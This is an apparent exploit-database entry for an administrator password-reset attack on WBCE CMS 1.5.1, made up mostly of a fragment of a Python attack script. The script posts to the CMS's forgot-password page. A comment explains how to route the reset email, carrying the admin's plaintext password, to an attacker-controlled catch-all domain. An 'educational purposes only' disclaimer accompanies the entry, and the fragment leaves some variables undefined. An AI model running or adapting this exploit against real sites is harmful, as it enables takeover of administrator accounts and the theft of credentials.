Exploits / Vulnerability Discovered : 2021-12-20 |
Type : webapps |
Platform : php
This exploit / vulnerability Wbce cms 1.5.1 admin password reset is for educational purposes only and if it is used you will do on your own risk!
_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature
r = requests.post(url = _url, headers = headers, data = _p)
if r.status_code == 200:
print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')